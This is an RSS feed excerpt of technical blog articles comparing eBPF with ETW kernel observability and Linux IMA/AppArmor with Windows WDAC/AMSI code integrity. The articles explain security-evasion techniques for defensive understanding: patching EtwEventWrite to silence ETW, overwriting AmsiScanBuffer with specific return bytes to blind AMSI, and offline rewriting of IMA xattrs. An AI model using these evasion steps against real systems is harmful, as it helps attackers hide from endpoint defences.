&lt;td&gt;Producer per-event cost&lt;/td&gt;
&lt;td&gt;Constant: format + memcpy to per-CPU buffer&lt;/td&gt;
&lt;td&gt;JIT-compiled native code at hook&lt;/td&gt;
&lt;td&gt;JIT or signed-driver call at hook&lt;/td&gt;
&lt;td&gt;Probe handler call&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Verifier&lt;/td&gt;
&lt;td&gt;Driver signing only&lt;/td&gt;
&lt;td&gt;Linux in-kernel heuristic verifier&lt;/td&gt;
&lt;td&gt;PREVAIL in user mode + KMCI&lt;/td&gt;
&lt;td&gt;None (D is interpreted, safe-by-construction)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Verifier soundness incidents&lt;/td&gt;
&lt;td&gt;Not applicable&lt;/td&gt;
&lt;td&gt;4 widely-disclosed CVEs (2020-2023)&lt;/td&gt;
&lt;td&gt;None disclosed&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hook coverage&lt;/td&gt;
&lt;td&gt;Universal across Windows API surface&lt;/td&gt;
&lt;td&gt;Universal: kprobe, uprobe, tracepoint, XDP, TC, LSM, sched&lt;/td&gt;
&lt;td&gt;XDP, BIND, SOCK_OPS, SOCK_ADDR, process&lt;/td&gt;
&lt;td&gt;Solaris/BSD/macOS provider set&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-platform&lt;/td&gt;
&lt;td&gt;Windows only&lt;/td&gt;
&lt;td&gt;Linux only&lt;/td&gt;
&lt;td&gt;Source-compatible with Linux subset&lt;/td&gt;
&lt;td&gt;Solaris, FreeBSD, macOS (legacy)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Transport&lt;/td&gt;
&lt;td&gt;Per-CPU ring buffer, .etl files&lt;/td&gt;
&lt;td&gt;Ringbuf, perf_event_array, maps&lt;/td&gt;
&lt;td&gt;Ringbuf, maps&lt;/td&gt;
&lt;td&gt;Per-CPU buffers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trust model&lt;/td&gt;
&lt;td&gt;Manifest registration + driver signing&lt;/td&gt;
&lt;td&gt;Verifier + CAP_BPF + CAP_PERFMON&lt;/td&gt;
&lt;td&gt;Verifier + HVCI + driver signing&lt;/td&gt;
&lt;td&gt;Privilege check + safe-by-construction&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Adoption pattern&lt;/td&gt;
&lt;td&gt;Defender, Sysmon, CrowdStrike, SentinelOne, Carbon Black&lt;/td&gt;
&lt;td&gt;Cilium, Falco, Tetragon, Tracee, Pixie, Sysmon for Linux&lt;/td&gt;
&lt;td&gt;Pre-production; Azure test deployments&lt;/td&gt;
&lt;td&gt;Solaris/macOS legacy + bpftrace via inspiration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best suited for&lt;/td&gt;
&lt;td&gt;Forensic capture across the entire Windows API surface&lt;/td&gt;
&lt;td&gt;Hot-path filtering and aggregation with arbitrary kernel hooks&lt;/td&gt;
&lt;td&gt;Cross-platform networking observability&lt;/td&gt;
&lt;td&gt;Interactive debugging on Solaris-lineage systems&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;The asymptotic argument&lt;/h3&gt;
&lt;p&gt;Two designs can be compared asymptotically. ETW carries N events of average size S; the kernel-to-user wire cost is Omega(NS) -- the unavoidable lower bound for streaming N events. eBPF can reduce that to O(M) where M is the aggregation size, for workloads that aggregate before the events cross the boundary. The bpftrace histogram from section 4 is the concrete example: &lt;code&gt;vfs_read&lt;/code&gt; can fire ten million times per second while the user-side bandwidth is zero, because the per-CPU histogram never crosses the boundary until print time.&lt;/p&gt;
&lt;p&gt;The asymmetry is the entire reason eBPF makes sense for high-frequency telemetry. It is also the reason every cloud-native observability tool from 2018 onward is on eBPF. When the producer rate exceeds the user-space consumption rate, you do not have a choice: you either drop events or aggregate them in-kernel. ETW can drop. Only eBPF can aggregate.&lt;/p&gt;
&lt;h3&gt;The tail-call attack class&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;bpf_tail_call(ctx, &amp;amp;prog_array, index)&lt;/code&gt; is powerful and its power has structural consequences. From the BPF trampoline v3 cover letter [@lore-kernel-org-1-astkernelorg-2], the kernel team is explicit that the trampoline was designed in part as a &lt;em&gt;replacement&lt;/em&gt; for tail-call-based chaining: &lt;em&gt;&quot;In many cases it can be used as a replacement for bpf_tail_call-based program chaining.&quot;&lt;/em&gt; The motivation is structural -- there are three attack classes implicit in the tail-call mechanism, and the trampoline avoids them.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Branch-target injection on the tail-call dispatcher.&lt;/em&gt; Pre-mitigation kernels exposed an indirect branch from kernel mode -- the dispatcher selecting its target from a user-controllable &lt;code&gt;prog_array&lt;/code&gt; index. That is exactly the shape of a Spectre-v2 gadget. Mitigation: retpolined dispatcher and the BPF trampoline replacement that avoids the indirect branch entirely.The qualitative reason fentry beats kprobe is not a benchmark; it is the avoidance of a retpoline. The v3 patch cover letter spells this out: &lt;em&gt;&quot;To avoid the high cost of retpoline the attached BPF programs are called directly.&quot;&lt;/em&gt; Real numbers vary by microarchitecture, retpoline implementation, and the rest of the kernel-build configuration, but the structural reason is the same on every machine.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Recursion-bound bypass.&lt;/em&gt; The 33-call cap protects the verifier&apos;s termination proof for a single program from being bypassed by chaining, but it is a per-execution counter. A sequence of attached programs at different attach points can still produce arbitrary aggregate work. The mitigation lives in per-event scheduling, not in the verifier.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Speculative type confusion.&lt;/em&gt; The verifier proves a single program&apos;s register-type invariants. The target of a tail call is selected at runtime from a map, so speculative execution can execute a different program under the calling program&apos;s type-state. Mitigation: indirect-call hardening shared with the rest of the kernel.&lt;/p&gt;

flowchart LR
    A[&quot;Calling BPF program&quot;]
    B[&quot;bpf_tail_call(ctx, &amp;amp;arr, idx)&quot;]
    C[&quot;JIT dispatcher -- (indirect jump)&quot;]
    D{&quot;Map slot at idx&quot;}
    E[&quot;Target BPF program&quot;]
    F[&quot;Speculative path -- (wrong target)&quot;]
    G[&quot;Retpoline / BPF trampoline -- (direct call)&quot;]
    A --&amp;gt; B --&amp;gt; C --&amp;gt; D
    D -- correct --&amp;gt; E
    D -. speculative .-&amp;gt; F
    G -. mitigation .-&amp;gt; C
&lt;h3&gt;The ETW user-mode bypass&lt;/h3&gt;
&lt;p&gt;ETW has its own structural attack class, mentioned in section 3 and worth restating in the trust-model context. A process that wants to silence its own ETW emissions can patch &lt;code&gt;ntdll!EtwEventWrite&lt;/code&gt; to a &lt;code&gt;ret&lt;/code&gt; instruction in its own address space. The kernel buffer never sees the event. EDR vendors monitor for this integrity violation out of band, and use the patch itself as a high-confidence detection signal.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; ETW&apos;s emission path runs in the calling process&apos;s own address space. A process that wants to hide its activity can patch the &lt;code&gt;ntdll!EtwEventWrite&lt;/code&gt; thunk to &lt;code&gt;ret&lt;/code&gt;, silencing emissions before they reach the kernel buffer. EDR vendors monitor for this integrity violation out of band, and treat the patch as a detection in its own right. The deeper question is whether any user-mode emission primitive can be tamper-resistant under hostile user-mode code. The current answer is &quot;no&quot;: the mitigation has been to move the trust boundary into the kernel, via PPL, the kernel-only Threat-Intelligence provider, and (on Linux) LSM hooks that observe &lt;code&gt;mprotect&lt;/code&gt; and image-load operations directly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Trust models, side by side&lt;/h3&gt;
&lt;p&gt;ETW trusts manifest registration plus Code Integrity for kernel drivers. The kernel only emits events; the only adversary-controllable surface is the user-mode provider, and the integrity-violation tell catches the obvious attack.&lt;/p&gt;
&lt;p&gt;Linux eBPF trusts the verifier plus &lt;code&gt;CAP_BPF&lt;/code&gt; and &lt;code&gt;CAP_PERFMON&lt;/code&gt;. The verifier is the kernel-mode safety boundary; capabilities gate who can load programs at all. Both have been the source of soundness CVEs and exploitation paths. Defense in depth: unprivileged eBPF off by default since 5.16, hardening of the indirect-call dispatcher, ongoing verifier work.&lt;/p&gt;
&lt;p&gt;eBPF for Windows trusts PREVAIL plus HVCI driver signing. The verifier runs in user mode; the kernel only ever sees a signed driver or a JIT-emitted buffer that has already passed the verifier. The composition is &lt;em&gt;strictly more conservative&lt;/em&gt; than Linux eBPF, because it stacks the verifier on top of the signing model rather than replacing it. Microsoft is using the Windows kernel-mode trust mechanism &lt;em&gt;and&lt;/em&gt; adding the eBPF verifier to it, not choosing between them.&lt;/p&gt;
&lt;p&gt;The next layer up from the kernel substrate is the consumer layer -- the agents and SIEM pipelines practitioners actually ship. That production stack is what determines which substrate practitioners reach for first.&lt;/p&gt;
&lt;h2&gt;8. Production Adoption: The Agent Layer&lt;/h2&gt;
&lt;p&gt;The substrate matters because the consumer stack does. On Linux, eBPF is the foundation of every serious cloud-native security and observability project. On Windows, ETW is the same. The portable subset is small but real, and it is growing.&lt;/p&gt;
&lt;h3&gt;The Linux side&lt;/h3&gt;
&lt;p&gt;Cilium [@cilium-io] is the dominant eBPF-based networking project, CNCF-graduated [@falco-org-docs] and shipping Kubernetes cluster networking, NetworkPolicy enforcement, and a service mesh implementation. Falco [@falco-org], originally created by Sysdig and now CNCF-graduated, provides eBPF-based runtime threat detection driven by a rules engine. Tetragon [@tetragon-io-docs-overview], a Cilium subproject, attaches eBPF programs to kprobes and LSM hooks for in-kernel enforcement -- not just observation but the ability to block. Tracee [@github-com-aquasecurity-tracee] from Aqua Security is an eBPF runtime security tool. Pixie [@docs-px-dev], originally Pixie Labs and now under New Relic, uses eBPF for auto-instrumentation of services running in Kubernetes.&lt;/p&gt;
&lt;p&gt;Sysmon for Linux [@github-com-microsoft-sysmonforlinux] is the most architecturally interesting member of the list. Microsoft, the company that built ETW and Sysmon, ported Sysmon to Linux by replacing the ETW back end with eBPF kprobes via the &lt;code&gt;SysinternalsEBPF&lt;/code&gt; library. The XML configuration schema and Event IDs are preserved, so SOC analysts see the same channel from either OS. It is the production demonstration that ETW and eBPF can be made surface-equivalent to a consumer.&lt;/p&gt;
&lt;h3&gt;The Windows side&lt;/h3&gt;
&lt;p&gt;Sysmon [@learn-microsoft-com-downloads-sysmon] is the canonical ETW consumer reference design, authored by Mark Russinovich and Thomas Garnier and free from Microsoft. Microsoft Defender for Endpoint [@learn-microsoft-com-defender-endpoint] is the commercial Microsoft EDR product, ETW-driven and cloud-connected. CrowdStrike Falcon, SentinelOne, and Carbon Black are the major third-party EDRs, all built on ETW. krabsetw [@github-com-microsoft-krabsetw] is Microsoft&apos;s C++ ETW consumer library; the &lt;code&gt;Microsoft.Diagnostics.Tracing.TraceEvent&lt;/code&gt; package is the .NET equivalent.&lt;/p&gt;
&lt;h3&gt;The toolchain layer&lt;/h3&gt;
&lt;p&gt;The eBPF world comes with a toolchain that does not have a direct ETW counterpart. &lt;code&gt;libbpf&lt;/code&gt; [@github-com-libbpf-libbpf] is the canonical C library for loading and managing eBPF programs. &lt;code&gt;bpftool&lt;/code&gt; [@github-com-libbpf-bpftool] is the inspection utility. &lt;code&gt;BCC&lt;/code&gt; [@github-com-iovisor-bcc] is the older Python-binding toolkit. &lt;code&gt;bpftrace&lt;/code&gt; [@github-com-iovisor-bpftrace] is the DSL inspired by DTrace. &lt;code&gt;cilium/ebpf&lt;/code&gt; [@github-com-cilium-ebpf] is the Go library; &lt;code&gt;aya&lt;/code&gt; [@github-com-rs-aya] and &lt;code&gt;libbpf-rs&lt;/code&gt; [@github-com-libbpf-rs] are the Rust libraries. The toolchain coverage tells you something about the substrate: a Go developer can write an eBPF program and have it loaded by their existing service binary, because the load-verify-attach lifecycle has a Go binding.&lt;/p&gt;
&lt;p&gt;ETW has its own toolchain -- &lt;code&gt;tracerpt.exe&lt;/code&gt;, Windows Performance Analyzer, BenchmarkDotNet, krabsetw -- but the toolchain is shaped around &lt;em&gt;consuming&lt;/em&gt; events, not around emitting programs into the kernel. The asymmetry of the toolchains mirrors the asymmetry of the substrates.&lt;/p&gt;
&lt;h3&gt;The decision guide&lt;/h3&gt;

**Windows EDR or building on Microsoft Defender for Endpoint.** Use ETW plus Sysmon plus the `Microsoft-Windows-Threat-Intelligence` provider. eBPF for Windows is not yet a substitute for Defender-grade kernel telemetry; the hook surface is too narrow.&lt;p&gt;&lt;strong&gt;Linux runtime-security or cluster networking.&lt;/strong&gt; Use eBPF. Pick &lt;code&gt;libbpf&lt;/code&gt; or &lt;code&gt;cilium/ebpf&lt;/code&gt; for the language binding. Attach LSM hooks for enforcement; fentry for observability. The verifier will fight you; that is expected.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cross-platform networking observability with one source surface.&lt;/strong&gt; Use eBPF for Windows and Linux eBPF together, restricted to the XDP, SOCK_ADDR, SOCK_OPS, and BIND hooks. The Linux source compiles unchanged on Windows for this subset.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Forensic capture across the full Windows API surface.&lt;/strong&gt; Use ETW into &lt;code&gt;.etl&lt;/code&gt; files, analyzed in Windows Performance Analyzer. Nothing else covers that breadth on Windows.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Sysmon-for-Linux case study is the cleanest practical justification for the abstract-surface convergence. If your SIEM consumes Sysmon XML and matches on Event ID and field, you can run a fleet of Windows hosts on ETW and Linux hosts on eBPF and the SIEM will not know the difference. The substrate is invisible at the consumer&apos;s contract; what matters is that the contract is preserved across the back-end change. This is the production realization of the engineering pattern -- different mechanisms, identical schemas -- that the rest of the article has been describing in architectural terms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The consumer stack has converged at the surface layer: XML configs, Event IDs, EDR vendor APIs. The substrate has not, and the open problems in the next section are what stands in the way.&lt;/p&gt;
&lt;h2&gt;9. Open Problems and the Frontier&lt;/h2&gt;
&lt;p&gt;What can we not do yet? Four open problems will shape the next five years of kernel observability.&lt;/p&gt;
&lt;h3&gt;9.1 Verifier-driven false rejection&lt;/h3&gt;
&lt;p&gt;Programs that PREVAIL and a human can both prove safe still get rejected by the Linux verifier, which returns the cryptic &lt;em&gt;&quot;verifier complexity limit reached&quot;&lt;/em&gt; error. EDR vendors end up fighting the verifier rather than writing the program they want. The workarounds are real and ugly: &lt;code&gt;__attribute__((noinline))&lt;/code&gt; annotations to force the compiler to emit function boundaries the verifier can prune around, explicit bound assertions that re-derive properties the compiler already knows, &lt;code&gt;bpf_loop()&lt;/code&gt; to externalize loops the verifier cannot trace. The HotOS 2023 thesis is exactly that this is not a bug -- it is a property of any heuristic verifier under the soundness-completeness-scalability triangle. The completeness leg is the one the Linux verifier gives up first, every time.&lt;/p&gt;
&lt;p&gt;The frontier here is twofold. On one side, the verifier is becoming more capable: bounded loops, &lt;code&gt;bpf_for_each_map_elem&lt;/code&gt;, kfuncs, and the trampoline-based attach mechanisms have all expanded what the verifier can prove. On the other side, PREVAIL&apos;s polynomial-time abstract-interpretation approach represents an alternative architectural lineage. Neither approach removes the underlying undecidability. Both make the rejection threshold higher.&lt;/p&gt;
&lt;h3&gt;9.2 Cross-OS eBPF ABI&lt;/h3&gt;
&lt;p&gt;The eBPF Foundation&apos;s RFC 9669 [@rfc-editor-org-rfc-rfc9669html], published as an IETF Independent Submission in October 2024, standardized the &lt;em&gt;instruction set architecture&lt;/em&gt; for BPF programs. The RFC describes the 64-bit ISA, the encoding of instructions, the memory model, and the verifier&apos;s basic obligations. It is the cleanest cross-OS contract eBPF has ever had.&lt;/p&gt;
&lt;p&gt;What the RFC does &lt;em&gt;not&lt;/em&gt; standardize: helpers, map types, and hook semantics. Those remain Linux-defined-in-practice. The eBPF-for-Windows helper set is a subset, with extensions for Windows-specific concepts. The FreeBSD and illumos ports have their own subsets. A single observability agent that runs everywhere needs more than a standardized ISA; it needs a standardized helper API and a standardized hook taxonomy. Today, EDR vendors writing cross-OS agents ship two distinct programs that share a build system and not much else.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; RFC 9669 is the ISA standard. It defines what BPF bytecode looks like and what the verifier must check. It does not define which helpers a program can call, what the map types are, or what hooks the program can attach to. Those are the parts that vary between Linux, Windows, and the BSDs. Standardizing them is more of a committee problem than a research problem -- a meaningful subset is achievable; a full superset probably is not.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.3 ETW evasion at the trust boundary&lt;/h3&gt;
&lt;p&gt;The user-mode &lt;code&gt;EtwEventWrite&lt;/code&gt; patching attack class is roughly 2020-vintage but has not gone away. The kernel-emitted &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; provider is the current best mitigation: kernel signals cannot be patched from user mode, so an attacker who silences user-mode emissions still trips kernel-only signals on &lt;code&gt;mprotect&lt;/code&gt;, image load, and remote thread creation.&lt;/p&gt;
&lt;p&gt;The deeper structural question is whether any user-mode primitive can ever be tamper-resistant under hostile user-mode code. The short answer is no, which is why the answer keeps moving the trust boundary into the kernel -- through PPL, through LSM, through signed drivers. On Linux, the same pattern shows up: hostile-user-mode-resistant telemetry must run inside the kernel, which is why the LSM hooks are the part of the eBPF hook surface that matters most for EDR.&lt;/p&gt;
&lt;h3&gt;9.4 Hot-path overhead at scale&lt;/h3&gt;
&lt;p&gt;Production environments routinely run Falco, Cilium, and a vendor EDR on the same kernel, each attaching probes to the same hook. The marginal cost of an eBPF kprobe on a five-million-events-per-second syscall is not zero, and the cost compounds non-linearly when three different agents attach to the same hook with three different programs.&lt;/p&gt;
&lt;p&gt;The current partial mitigations are real. &lt;code&gt;fentry&lt;/code&gt;/&lt;code&gt;fexit&lt;/code&gt; plus the BPF trampoline removed the per-attach trap-frame cost. &lt;code&gt;kprobe.multi&lt;/code&gt;, added in Linux 5.18, lets a single program attach to multiple functions with one trampoline. BPF-link iteration lets one agent observe what another has attached. But none of these compose perfectly: three different vendors with three different agents end up with three different trampolines on the same function. The structural fix is &lt;em&gt;trampoline sharing&lt;/em&gt;, and the implementation is attach-type-specific.The multi-agent attach problem is the eBPF version of a familiar systems issue: when N independent consumers each install their own instrumentation at the same point, the cost is N times the cost of one. Linux has solved this once for kprobes (with &lt;code&gt;kprobe.multi&lt;/code&gt;) and is solving it again for the BPF trampoline. Whether the same pattern can be made cheap for fentry attaches across LSM hooks is an open implementation question.&lt;/p&gt;
&lt;p&gt;The frontier of kernel observability is not &quot;build a new substrate.&quot; It is &quot;make the existing substrates compose under multi-tenant production load.&quot;&lt;/p&gt;
&lt;h2&gt;10. Two Generations&lt;/h2&gt;
&lt;p&gt;Return to the SOC analyst from section 1. The Sysmon Operational channel looks the same on both hosts. Now you know why -- and also why the similarity is a deliberate engineering choice rather than a coincidence.&lt;/p&gt;
&lt;p&gt;ETW is mature, has full Windows coverage, is emission-only. It is a &lt;em&gt;catalog&lt;/em&gt; of events. Every Windows subsystem registers a provider, every provider declares a manifest, every event has a stable schema. A consumer that knows the manifest knows what to expect. The trust boundary is the kernel-mode driver signing model. The cost is that aggregation, sampling, and filtering all happen in user space, after the event has crossed the boundary.&lt;/p&gt;
&lt;p&gt;eBPF is programmable, has filter and aggregation in-kernel, has a verifier. It is a &lt;em&gt;language&lt;/em&gt; for asking questions of the kernel, not a catalog of pre-defined answers. The trust boundary is the verifier, which is a research-grade static analyzer running as kernel code. Linux&apos;s verifier shipped four widely-disclosed soundness bugs in four years. PREVAIL trades that soundness leg for a more conservative completeness story. The trade-offs are not finished.&lt;/p&gt;
&lt;p&gt;eBPF-for-Windows is the convergence experiment. The native mode -- PREVAIL plus &lt;code&gt;bpf2c&lt;/code&gt; plus MSVC plus a signed &lt;code&gt;.sys&lt;/code&gt; driver -- is the first cross-OS-portable kernel-observability primitive. As of 2026 it covers a networking subset of hooks, not the full Linux surface. That gap is not architectural; it is a list of hooks Microsoft has not yet exposed. The pattern is generalizable: cross-OS observability lives in the verifier, not in the runtime, and each OS lifts verified bytecode into its own trust model.&lt;/p&gt;
&lt;p&gt;The generation gap is literal. ETW (2000) is an event bus. eBPF (2014) is a programmable kernel substrate. Both will still ship in 2035. Both will still be the right answer for some workloads. The interesting work for the next decade is in the convergence layer -- helper-API standardization, hook-point taxonomy alignment, verifier completeness -- and in the multi-tenant production engineering that makes ten different agents on one kernel cheaper than ten times one agent.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Kernel observability has matured from event emission to programmable kernel computation. That generation gap is why eBPF-for-Windows -- a small, work-in-progress project -- is one of the more architecturally significant operating-system-telemetry events of the last decade. The portable abstraction is not the runtime. It is the static analyzer.&lt;/p&gt;
&lt;/blockquote&gt;

No. As of 2026, eBPF for Windows [@github-com-for-windows] covers a networking-heavy subset of hooks -- XDP, BIND, SOCK_OPS, SOCK_ADDR, and process creation and exit -- and is not yet a substitute for Defender-grade kernel telemetry. ETW remains the canonical Windows observability substrate. The convergence between the two is real for the networking subset, and is the work-in-progress for the rest of the surface.

Because it is a heuristic abstract interpreter on a Turing-complete ISA, and Rice&apos;s theorem says no such verifier can be simultaneously sound, complete, and decidable. Real verifiers ship with all three approximately, and the soundness leg fails first when state pruning loses information at a join point. CVE-2023-2163 [@nvd-nist-gov-2023-2163], CVE-2022-23222 [@nvd-nist-gov-2022-23222], CVE-2021-3490 [@nvd-nist-gov-2021-3490], and CVE-2020-8835 [@nvd-nist-gov-2020-8835] are all instances of that pattern.

For the networking subset (XDP, SOCK_ADDR, SOCK_OPS, BIND), yes -- eBPF for Windows [@github-com-for-windows] is source-compatible with Linux eBPF for those hooks. For arbitrary kprobes or LSM hooks, no -- those hooks are Linux-internal and eBPF for Windows does not expose equivalents. Cross-platform agents typically ship two binaries that share a build system.

Since Linux 5.16 (March 2022) [@kernel-org-bpf-indexhtml], `kernel.unprivileged_bpf_disabled=1` is the kernel default. Production EDRs run with `CAP_BPF` plus `CAP_PERFMON` or root. Leaving unprivileged eBPF enabled was the entry point for several verifier CVEs, so the conservative default is correct.

A kprobe is a runtime breakpoint mechanism: the kernel patches a trap instruction at the target address, and the trap handler invokes the attached eBPF program. fentry uses the BPF trampoline [@lore-kernel-org-1-astkernelorg] -- a small JIT-emitted dispatcher that calls attached BPF programs with a direct call, avoiding the retpoline penalty an indirect dispatch would pay on Spectre-mitigated kernels. Starovoitov&apos;s framing: *&quot;practically zero overhead&quot;* for fentry, relative to the kprobe trap-frame cost.

No. ETW sessions filter by provider, keyword, and level. That is it. Any per-event computation -- counting, sampling, stack-trace folding, downsampling -- runs in user mode on the consumer side, after the event has crossed the kernel-user boundary. The lack of an in-kernel filter language is the structural reason eBPF can do things ETW cannot, like aggregate ten million `vfs_read` calls per second into a histogram without saturating the wire.

Sysmon for Linux [@github-com-microsoft-sysmonforlinux] replaces the ETW back end with eBPF kprobes via Microsoft&apos;s `SysinternalsEBPF` library. The XML configuration schema, Event IDs, and Operational channel output are preserved, so a SIEM consumer sees identical telemetry from either OS. It is the production demonstration that ETW and eBPF can be made surface-equivalent to a consumer.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;ebpf-vs-etw-two-generations-of-kernel-observability&quot; keyTerms={[
  { term: &quot;ETW&quot;, definition: &quot;Event Tracing for Windows. The Windows 2000-onward kernel-mediated event bus, with providers, sessions, consumers, and per-CPU ring buffers.&quot; },
  { term: &quot;eBPF&quot;, definition: &quot;Extended Berkeley Packet Filter. A safe, sandboxed kernel virtual machine introduced in Linux 3.18 (2014) that runs verified user-supplied bytecode at attached hook points.&quot; },
  { term: &quot;Verifier&quot;, definition: &quot;The kernel-side static analyzer that proves termination and memory safety of every eBPF program before load. The Linux verifier uses a heuristic register-state lattice; PREVAIL uses zone-domain abstract interpretation.&quot; },
  { term: &quot;BPF Map&quot;, definition: &quot;A kernel-managed key-value store accessible from inside an eBPF program and from user space. Types include hash, array, per-CPU hash, and ring buffer.&quot; },
  { term: &quot;Ringbuf&quot;, definition: &quot;The BPF ring buffer map type (Linux 5.8). A multi-producer single-consumer transport that preserves cross-CPU event ordering.&quot; },
  { term: &quot;HVCI&quot;, definition: &quot;Hypervisor-enforced Code Integrity. The Windows feature that uses the hypervisor to enforce kernel-mode code signing. Blocks dynamic kernel-mode code generation by default.&quot; },
  { term: &quot;PREVAIL&quot;, definition: &quot;The user-mode eBPF verifier used by eBPF for Windows. Based on numerical abstract interpretation over the zone domain plus intervals, with formal grounding in Gershuni et al. PLDI 2019.&quot; },
  { term: &quot;bpf2c&quot;, definition: &quot;The eBPF-for-Windows transliterator that emits portable C from verified BPF bytecode, one C statement per BPF instruction. The C is compiled by MSVC into a signed .sys driver.&quot; }
]} questions={[
  { q: &quot;Why did performance counters fail for security telemetry?&quot;, a: &quot;Three structural reasons: sampling-rate floor (counters aggregate at the consumer&apos;s query rate, hiding individual events), no event identity (a count tells you N happened, not which user did what), and no causal order (two counters sampled in sequence are not causally ordered with respect to the events they describe).&quot; },
  { q: &quot;What three properties does the soundness-completeness-scalability triangle say a verifier can&apos;t have all of?&quot;, a: &quot;Soundness (never accept an unsafe program), completeness (never reject a safe program), and scalability (run in polynomial time on real programs). Rice&apos;s theorem implies no decision procedure for a non-trivial semantic property on a Turing-complete ISA can have all three. Real verifiers must trade off.&quot; },
  { q: &quot;How does eBPF for Windows lift verified bytecode into the Windows kernel?&quot;, a: &quot;In native mode, PREVAIL verifies the bytecode in user space. On success, the bpf2c tool transliterates each verified BPF instruction to one C statement, MSVC compiles the C to a signed .sys kernel driver, and the kernel loads the driver through the standard Authenticode / HVCI / KMCI signing pipeline.&quot; },
  { q: &quot;Name two structural attack-class implications of bpf_tail_call.&quot;, a: &quot;Branch-target injection on the tail-call dispatcher (an indirect jump from kernel mode selecting its target from a user-controllable map slot is a Spectre-v2 gadget) and speculative type confusion (the verifier proves a single program&apos;s register types, but a tail call&apos;s target is a runtime-resolved map slot, so speculative execution can run a different program under the wrong type-state).&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>ebpf</category><category>etw</category><category>kernel-observability</category><category>edr</category><category>verifier</category><category>windows-internals</category><category>linux-kernel</category><category>tracing</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI</title><link>https://paragmali.com/blog/two-routes-to-code-integrity-linux-ima--apparmor-vs-windows-/</link><guid isPermaLink="true">https://paragmali.com/blog/two-routes-to-code-integrity-linux-ima--apparmor-vs-windows-/</guid><description>Linux and Windows answer one question -- &quot;is this code allowed to run?&quot; -- with very different machinery. Where the verifier lives matters more than how strong it is.</description><pubDate>Sat, 16 May 2026 00:00:00 GMT</pubDate><content:encoded>
Linux and Windows have spent fifteen years answering the same question -- &quot;is this code allowed to run?&quot; -- and arrived at radically different architectures. Linux composes half a dozen narrow kernel modules (IMA, EVM, AppArmor, SELinux, fs-verity, IPE) plus a userspace daemon (`fapolicyd`); Windows ships one integrated suite (App Control + HVCI + AMSI + Smart App Control). Both stacks shipped their v1 with the **check in the wrong place**, and the architectural pivots that fixed it -- EVM&apos;s HMAC-sealed xattrs, HVCI&apos;s hypervisor-isolated verifier, IPE&apos;s property-based decisions -- are the breakthrough lesson of this comparison. Crypto is solved. Trust-boundary protection and policy expressiveness are not, and Rice&apos;s theorem says they never fully will be.
&lt;h2&gt;1. Two bypasses, same architectural shape&lt;/h2&gt;
&lt;p&gt;On a Windows 11 desktop, an attacker with a PowerShell session under their control can blind Microsoft Defender to every script that session ever evaluates by overwriting six bytes inside one function in &lt;code&gt;amsi.dll&lt;/code&gt;. The &lt;a href=&quot;https://paragmali.com/blog/amsi-the-pre-execution-window-defender/&quot; rel=&quot;noopener&quot;&gt;Antimalware Scan Interface&lt;/a&gt;, the in-process bridge between scripting hosts and the registered antivirus product, dutifully reports &quot;clean&quot; on every subsequent buffer because the prologue of &lt;code&gt;AmsiScanBuffer&lt;/code&gt; has been patched to &lt;code&gt;mov eax, 0; ret&lt;/code&gt; (&lt;code&gt;B8 00 00 00 00 C3&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;The interface ships exactly as Microsoft documents it, and the function still has the signature in MSDN [@learn-microsoft-com-amsi-amsiscanbuffer]: the attacker did not need to break anything. They needed only to write into the address space they already owned.&lt;/p&gt;
&lt;p&gt;On a Linux server, a different attacker with offline access to the disk -- recovered from a stolen laptop, a forensics image, a hostile cloud-provider snapshot -- mounts the filesystem and rewrites a system binary together with the file&apos;s &lt;code&gt;security.ima&lt;/code&gt; extended attribute. When the box boots, the kernel&apos;s Integrity Measurement Architecture hashes the binary at exec time, compares the hash to the value stored in &lt;code&gt;security.ima&lt;/code&gt;, sees a match, and allows execution. Without the Extended Verification Module, IMA appraisal has no defence against this offline-rewrite attack [@lwn-net-articles-394170] -- the reference hash is sitting next to the file the attacker just replaced.&lt;/p&gt;
&lt;p&gt;Both operating systems claim fail-closed code-integrity enforcement. Both lose to a single architectural mistake about &lt;strong&gt;where the check runs&lt;/strong&gt;. The mistakes are different in detail and identical in shape: the verifier is reachable by the attacker. On Windows the attacker shares the script host&apos;s address space with the scanner. On Linux the attacker shares the on-disk container with the reference hash.&lt;/p&gt;
&lt;p&gt;This article exists to make that symmetry visible. The two stacks reached their 2026 form by very different routes -- Linux composes six narrow Linux Security Modules and one userspace daemon, Windows ships one tightly-coupled product line -- but the breakthroughs on each side answered the same question: how do you move the verifier out of reach?&lt;/p&gt;
